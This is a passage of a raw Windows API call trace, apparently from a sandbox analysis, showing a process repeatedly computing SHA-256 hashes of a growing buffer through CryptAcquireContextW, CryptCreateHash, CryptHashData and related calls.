	[0154.856] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d208, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d208, pdwDataLen=0x128aac) returned 1
	[0154.856] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.856] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.856] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.857] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.857] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0154.857] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.857] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d230
	[0154.857] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d230, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d230, pdwDataLen=0x128aac) returned 1
	[0154.857] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.857] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.857] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.857] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.857] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0154.857] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.857] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d258
	[0154.857] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d258, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d258, pdwDataLen=0x128aac) returned 1
	[0154.857] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.857] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.857] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.858] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.858] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0154.858] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.858] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d280
	[0154.858] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d280, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d280, pdwDataLen=0x128aac) returned 1
	[0154.858] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.858] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.858] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.858] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.858] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0154.858] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.858] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d2a8
	[0154.858] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d2a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d2a8, pdwDataLen=0x128aac) returned 1
	[0154.858] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.858] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.858] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.859] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.859] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0154.859] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.859] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d2d0
	[0154.859] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d2d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d2d0, pdwDataLen=0x128aac) returned 1
	[0154.859] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.859] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.859] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.859] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.859] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0154.859] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.859] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d2f8
	[0154.859] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d2f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d2f8, pdwDataLen=0x128aac) returned 1
	[0154.859] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.859] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.859] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.860] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.860] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0154.860] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.860] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d320
	[0154.860] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d320, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d320, pdwDataLen=0x128aac) returned 1
	[0154.860] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.860] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.860] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.860] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.860] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0154.860] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.860] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d348
	[0154.860] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d348, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d348, pdwDataLen=0x128aac) returned 1
	[0154.860] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.860] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.860] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.861] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.861] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0154.861] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d370
	[0154.861] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d370, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d370, pdwDataLen=0x128aac) returned 1
	[0154.861] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.861] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.861] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.861] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.861] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0154.861] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d398
	[0154.861] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d398, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d398, pdwDataLen=0x128aac) returned 1
	[0154.861] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.861] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.861] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.862] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.862] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0154.862] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.862] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d3c0
	[0154.862] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d3c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d3c0, pdwDataLen=0x128aac) returned 1
	[0154.862] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.862] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.862] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.863] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.863] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0154.863] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.863] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d3e8
	[0154.863] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d3e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d3e8, pdwDataLen=0x128aac) returned 1
	[0154.863] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.863] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.863] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.863] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.863] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0154.863] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.863] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d410
	[0154.863] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d410, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d410, pdwDataLen=0x128aac) returned 1
	[0154.863] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.863] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.863] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.864] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.864] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0154.864] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.864] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d438
	[0154.864] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d438, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d438, pdwDataLen=0x128aac) returned 1
	[0154.864] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.864] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.864] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.864] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.864] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0154.864] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.864] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d460
	[0154.864] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d460, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d460, pdwDataLen=0x128aac) returned 1
	[0154.864] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.864] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.864] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.865] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.865] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0154.865] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.865] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d488
	[0154.865] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d488, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d488, pdwDataLen=0x128aac) returned 1
	[0154.865] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.865] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.865] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.865] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.865] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0154.865] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.865] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d4b0
	[0154.865] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d4b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d4b0, pdwDataLen=0x128aac) returned 1
	[0154.865] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.865] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.865] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.866] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.866] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0154.866] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.866] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d4d8
	[0154.866] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d4d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d4d8, pdwDataLen=0x128aac) returned 1
	[0154.866] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.866] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.866] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.866] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.866] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0154.866] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.866] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d500
	[0154.866] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d500, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d500, pdwDataLen=0x128aac) returned 1
	[0154.866] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.866] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.866] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.867] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.867] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0154.867] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d528
	[0154.867] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d528, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d528, pdwDataLen=0x128aac) returned 1
	[0154.867] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.867] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.867] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.867] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.867] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0154.867] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d550
	[0154.867] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d550, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d550, pdwDataLen=0x128aac) returned 1
	[0154.867] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.867] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.867] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.868] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.868] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0154.868] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.868] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d578
	[0154.868] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d578, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d578, pdwDataLen=0x128aac) returned 1
	[0154.868] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.868] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.868] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.868] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.868] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0154.868] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.868] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d5a0
	[0154.868] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d5a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d5a0, pdwDataLen=0x128aac) returned 1
	[0154.868] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.868] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.868] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.869] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.869] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0154.869] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.869] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d5c8
	[0154.869] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d5c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d5c8, pdwDataLen=0x128aac) returned 1
	[0154.869] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.869] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.869] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.869] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.869] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0154.869] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.869] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d5f0
	[0154.869] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d5f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d5f0, pdwDataLen=0x128aac) returned 1
	[0154.869] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.869] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
